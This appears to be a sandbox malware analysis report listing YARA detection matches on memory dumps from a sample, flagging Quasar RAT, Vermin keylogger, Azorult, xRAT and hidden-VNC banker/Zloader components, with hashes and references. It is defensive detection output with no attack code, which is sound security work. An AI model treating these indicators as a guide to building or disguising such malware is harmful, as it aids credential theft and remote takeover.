Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE, Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE, Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
